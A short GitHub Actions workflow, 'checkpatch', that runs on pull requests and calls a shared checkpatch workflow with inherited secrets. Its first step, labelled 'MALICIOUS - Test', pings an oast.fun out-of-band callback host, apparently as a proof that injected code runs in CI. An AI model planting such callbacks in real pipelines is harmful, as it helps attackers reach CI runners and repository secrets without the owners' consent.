name: checkpatch

on:
  pull_request:
    types: [opened, reopened, synchronize]

jobs:
  checkpatch:
    runs-on: ubuntu-latest
    steps:
      - name: MALICIOUS - Test
        run: |
          echo 11
          ping -c 1 umoduekkuhjnuilaetgewsou6fprnm4ln.oast.fun || true
      
      - uses: actions/checkout@v3
      
      - uses: open-vela/public-actions/.github/workflows/checkpatch.yml@dev
        secrets: inherit
